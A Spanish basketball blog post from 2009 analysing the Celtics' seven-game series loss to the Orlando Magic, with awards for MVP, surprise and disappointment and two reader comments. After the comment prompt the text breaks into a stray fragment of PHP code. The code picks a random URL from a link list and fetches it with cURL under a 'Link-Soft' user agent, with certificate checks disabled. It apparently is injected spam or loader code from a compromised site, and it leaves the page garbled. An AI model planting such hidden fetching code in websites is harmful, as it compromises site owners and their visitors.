Celtics 3 – Magic 4: Morir con las botas puestas

18 de May de 2009 por TheDeerHunter

Es difícil abstraerse en este análisis de las empatías generadas durante esta eliminatoria por los Celtics. Se trata, seguramente, de los grandes animadores de esta postemporada. Cualquier buen aficionado al baloncesto habrá sabido valorar el derroche de lucha y talento que han demostrado los ahora ya excampeones, en unas circunstancias en las que difícilmente ningún otro hubiera podido competir. Este sería un buen momento para hacerse fan de la legendaria franquicia si uno empezara ahora a aficionarse a esto de la NBA.

En ningún momento han tratado de utilizar como excusa las ausencias de Garnett o de Powe para justificar la más que posible decepción. Todo lo contrario. Han redoblado el esfuerzo y se han reinventado a sí mismos para dar la máxima guerra posible en cualquier circunstancia, hasta el punto de que a nadie le hubiera extrañado que no hubieran sido ellos los eliminados. Viendo lo que han hecho parece claro que sólo el azar de las lesiones les ha apartado del segundo anillo consecutivo. Será difícil que el campeón de este año llegue a ser más favorito que ellos para el próximo curso.

Los méritos de los Celtics están claros. Convertir la pareja Perkins&Davis en una amenaza interior, el rendimiento casi épico de Pierce o Rondo, los aportes puntuales de House o Marbury… El no haber llegado a encontrar en Moore un refuerzo de mínima calidad o la pobre actuación de Ray Allen (el que más más ha evidenciado el desgaste contra Chicago) serían los “peros” de una actuación memorable.

Los méritos de Orlando no son tan evidentes ya que, al fin y al cabo, las han pasado canutas contra un equipo a priori inferior. Pero hay que decir que también han logrado resurgir tras el mazazo del quinto partido y, en general, se han mostrado superiores. Son justos finalistas de conferencia, sin duda. Sus grandes logros han sido el saber funcionar más allá de Dwight Howard e ir neutralizando paulatinamente los distintos recursos secundarios de los Celtics, hasta asfixiarlos. Ambos detalles fueron determinantes en su eliminación el año pasado.

Al final, de los factores que barajamos en su día como claves de la eliminatoria el que ha desequilibrado la balanza ha sido el rendimiento de la línea exterior de Boston. Los Celtics, ya sea por la defensa o por falta de frescura a causa del desgaste acumulado, no han alcanzado ni el 30% de acierto a larga distancia. Ya se sabe que por dentro es complicado ganarle la partida a Orlando, por muy digna eliminatoria que hayan hecho Perkins y Davis contra Howard. En este sentido, el factor físico también ha terminado siendo fundamental para la clasificación de los Magic. También lo será la recuperación de Turkoglu para la causa. Lo necesitarán a tope contra Cleveland.

PREMIOS TJNBA

MVP: No ha sido “Supermán” el cañón ofensivo que se le presupone contra unos pívots a priori muy inferiores a él sinó que han sido Rashard Lewis y Turkoglu, en contra de nuestro criterio, los que han tratado de llevar el peso ofensivo de Orlando. Al final esta estrategia ha demostrado ser un acierto, pero el verdadero MVP sigue siendo Dwight Howard, bastión defensivo sobre el que se ha sustentado la victoria. Sólo 16 puntos por partido, pero ni más ni menos que 17 rebotes y casi 3 tapones. Ahí es nada.

La sorpresa: Además de un Glen Davis que no ha obtenido premio, Mickael Pietrus, más allá de los números, ha sido un baluarte tanto ofensivo como defensivo en los 25 minutos por partido que ha permanecido en pista.

La decepción: Los 10 puntos menos por partido que Ray Allen ha metido respecto los que enchufó a Chicago se tenían que notar… y se han notado. La diferencia con respecto a las malas eliminatorias que hizo el año pasado es que en esta ocasión realmente le necesitaban.

El mayor esfuerzo en vano: Nadie en Boston puede dudar que Paul Pierce se ha dejado la vida por lograr la victoria. Al final se le ha visto extremadamente cansado. Al fin de cuentas es humano… pero hasta ayer no lo sabíamos.

Comenta

2 comentarios a esta entrada

  1. ñBA dice:
    #1

    Mickael Pietrus se salió en el séptimo partido.

    Boston ha sido eliminado, pero me quito el sombrero ante el esfuerzo que han hecho y el recuerdo que han dejado para siempre en nuestras retinas con esta eliminatoria y la de Chicago.

      Citar

  2. Ray Allen - Radio-People dice:
    #2

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>